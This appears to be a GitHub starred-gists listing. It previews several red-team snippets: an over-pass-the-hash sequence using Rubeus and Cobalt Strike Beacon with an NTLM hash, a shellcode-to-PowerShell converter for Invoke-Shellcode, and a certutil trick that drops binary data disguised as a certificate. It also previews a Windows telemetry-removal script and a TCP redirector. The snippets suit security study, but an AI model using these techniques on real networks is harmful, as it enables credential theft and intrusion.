Chris Ross xorrior

HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Dec 9, 2020
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
alirobe / reclaimWindows10.ps1
Last active Feb 21, 2021
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetry, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of (different defaults). N.…
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <>
# Modified by: alirobe <> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source:
# Tweaked Source:
# Tweak difference:
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
byt3bl33d3r /
Created Sep 13, 2015
Converts raw shellcode to a PowerShell compatible byte array (helpful when using custom shellcode with Invoke-Shellcode.ps1)
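import sys

# Python 2 script: build a PowerShell array literal from a raw binary file
ps_shellcode = '@('
with open(sys.argv[1], 'rb') as shellcode:
    # read one byte at a time until end of file
    byte = shellcode.read(1)
    while byte != '':
        ps_shellcode += '0x{}, '.format(byte.encode('hex'))
        byte = shellcode.read(1)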
mattifestation / drop_binary.bat
Created Jul 12, 2015
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
sivachandran /
Created Mar 4, 2012
A simple TCP redirector in python
#!/usr/bin/env python
import socket
import threading
import select
import sys
terminateAll = False
class ClientThread(threading.Thread):